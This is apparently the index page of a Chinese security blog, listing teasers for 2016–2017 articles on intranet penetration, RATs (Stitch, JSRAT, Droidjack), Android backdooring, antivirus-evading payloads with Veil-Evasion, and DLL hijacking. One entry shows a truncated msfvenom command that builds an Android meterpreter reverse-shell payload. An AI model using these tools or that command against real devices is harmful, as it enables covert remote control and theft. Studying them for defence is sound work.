内网渗透思路整理与工具使用
Eternal 8年前 (2017-04-05) 25183浏览 1评论
作者:Homaebic 前言 上个学期一直在学审计,前几天ST2漏洞大火,随便打一个就是root权限,我却拿着root权限不知如何继续进行。因为这个,发现了自己对渗透知识的缺失,因此用了两周左右的时间学习补充了一下内网渗透的知识,看了不少大牛的文...
Eternal 8年前 (2017-04-05) 25183浏览 1评论
作者:Homaebic 前言 上个学期一直在学审计,前几天ST2漏洞大火,随便打一个就是root权限,我却拿着root权限不知如何继续进行。因为这个,发现了自己对渗透知识的缺失,因此用了两周左右的时间学习补充了一下内网渗透的知识,看了不少大牛的文...
Eternal 8年前 (2017-03-30) 9786浏览 0评论
不知道各位差友有没有遇到过网络诈骗?除了骗老年人偏多的电信诈骗,最近骗子们又盯上了各个公司的财务人员。。。 类似事件的新闻截图 这些骗子主要靠伪装公司高管建群,组团诱骗公司财务人员汇款,已经发生了好多起案件了。 这不,前阵子,差评君的一个哥们...
Eternal 8年前 (2017-03-16) 9878浏览 1评论
Stitch是一款基于Python的跨平台远程管理工具。由于其跨平台性,Stitch允许用户针对Windows, Mac OSX 或 Linux分别定制不同的payload。你可以根据自己的需要,来选择绑定的IP及监听端口。你还可以设置是否在目标系...
Eternal 8年前 (2016-11-01) 8213浏览 1评论
作者:secist 前言 一天在我工作的时候,我妻子走到我办公桌前询问我,问我为什么我的电视是开着的?但是我也不知道是什么原因,虽然它就在我的办公桌旁,但我并没有去特意打开过它。我简单回顾了我当时的工作场景,当时我正在本地网络,运行着 Nma...
Eternal 8年前 (2016-10-20) 14703浏览 0评论
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用 backdoor-apk 从名字上我们就能知道它的用途了,没错就是用来制作 APK 后门的。这款工具使用起来非常方便,而且功能也很强大!话不多说,下面我们直接进入正题。 首先...
Eternal 8年前 (2016-10-08) 13595浏览 1评论
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用 Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload !kali 上并未安装...
Eternal 8年前 (2016-08-25) 8352浏览 0评论
微软的“不安全dll加载”漏洞涉及Windows XP至Windows 7等多个版本的操作系统。由于Windows存在加载未指明完整路径的dll文件的机制,可能导致用户在使用第三方软件、玩游戏、听音乐时,会加载由木马 病毒伪装而成的dll文件,从而让...
Eternal 8年前 (2016-08-16) 12740浏览 0评论
话不多说,我们直接切入正题。 1.首先我们打开Kali的命令终端,输入如下命令: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 >/roo...
Eternal 8年前 (2016-07-28) 31159浏览 0评论
免责声明:本教程旨在帮助大家更好地理解和学习工具的使用。切勿非法使用!本站保留一切解释权!对于以此造成的一切法律问题及后果,本站概不负责! JSRAT是一个由Python编写的脚本,它可以实现对远程PC的shell管理。 首先我们在Kali上打开命令...
Eternal 8年前 (2016-07-28) 41828浏览 1评论
免责声明:本教程旨在帮助大家更好地理解和学习工具的使用。切勿非法使用!本站保留一切解释权!对于以此造成的一切法律问题及后果,本站概不负责! Droidjack是一款针对安卓手机远程管理工具,你可以利用它在PC上对手机进行远程操控,不仅功能强大,使用...